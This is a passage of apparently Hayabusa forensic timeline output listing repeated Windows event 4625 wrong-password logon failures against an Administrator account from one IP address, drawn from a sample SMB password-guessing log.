01:51:14.722 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ogjMSxcUw7cF5dMa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.773 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 75uB8ejsSV5CbagM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.814 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5MMHLnyrzBQxluHn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.862 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5QXLn6fpmR52RBAz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.908 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KcdlrSUzcFNpaK5v : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.944 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VJjiRO5rJzZ8XtqP : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.986 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ncBraDdG2htkHjXU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.033 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Lo9DNrL44Z2S2SYR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.075 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QKcFiKC5QiIoHtxy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.120 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sqvq9GwuPCO15lUV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4XzgtJ3qUmkFiIY5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:15.215 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V1wc1Hjb4AK0Np1q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.253 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PKYNy0JyxIlFusMC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.298 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IrcKp13ut9M0pCi0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.341 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B3lJSH0r8iHAVhPF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.392 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ju3lCbvbwvkIKsBo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.435 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dQOHcZeAKQG6wHhC : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.474 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QBPkgoKDLABqdSQb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wqj4xOCsJg1j3IIh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.561 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XhBIu6wUPHc3DZAy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.604 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: W0fI1GhH5YTOHbNN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.652 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b7mLOWiojillZNYH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:15.702 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 37dknpwsl8j1WRWi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.748 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gzVum7a21sQe3fMt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.788 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JCFPSQmywelTXg74 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.832 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jCqb6TVV14hVX3NY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.888 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3qJsJrxVARedOdd3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.936 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: s7iNkrkBNEbXPK0B : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.975 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Bio4zciNRolyeHc1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.026 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IFf1vN5MgAIsdZvx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.072 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zWhgUQSWAycVdYoS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ugHUJZuKHYfUHXWS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AUeUmYa72BzHfyhK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:16.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ksydur7W1mUoOZAE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.261 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YNIzopnsXH6OjcUs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.296 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SQljJkaWs8bcaOI1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.344 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1jejn6ZMo564m7ok : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.440 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KrpBO1SCHpt27CRM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ifPePsozBYRLCU3k : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.521 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vve4r8QwaMLKrrcX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.569 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i9ArElR5k8yLefWu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.604 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4a1Y126C516BaGcz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.652 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VL7PnrO2dLsEbebQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.686 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GGTlLZ8J9f2PtiuL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:16.728 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6sVwPFs7bhJgJwRt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.772 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dgQNHL9etdHdRw9Q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.813 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mjZrWpJlN2CwbxFc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.858 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 72lmrp6neWGKAURB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.896 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CnTi5dgoWunYutJ9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.936 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Vi2fTl07llsJEYyt : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.980 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Hohh8KS1eYtojEya : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.020 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RsuC8F95UmsOSKvs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.064 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: be8UJ0EN7XS5r0b6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CgJlVYanwWKAhJ7O : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.156 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zthqCIkr1nKtqcCj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:17.200 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tzmi8I402j71q5Wg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.244 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: m0U3NYl8QEbgeJry : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.277 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uJJ1FOUIBInGkKPQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.316 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bu0X5RisszAHEs0X : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.370 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5ZZfs8zqT2bLOAHq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.409 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qkpO31LzJfaYLyjB : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.461 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BJrIsRTWUwPuySR7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.503 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VHNccqtwl9Y9IhLq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.536 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: APlvDcMzvms0gehT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.585 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AxOERGKI75RarVNZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uvzwd5qqC7og49yW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:17.662 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lksm3o2g0YhFnm4Z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zwXhSPCV4qHVF9Rc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.745 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: z31baZ4G36idFMeX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.784 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WK63qylKunHZB3zS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.816 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ALJxKGwyZz7JDpRg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.862 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q8tioTO3TEIzdzY0 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.905 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5dIKTgQkvPKzKJoZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.947 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ta0IMrlArbgONhDG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.985 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MKNUu4624Rvr87kK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.032 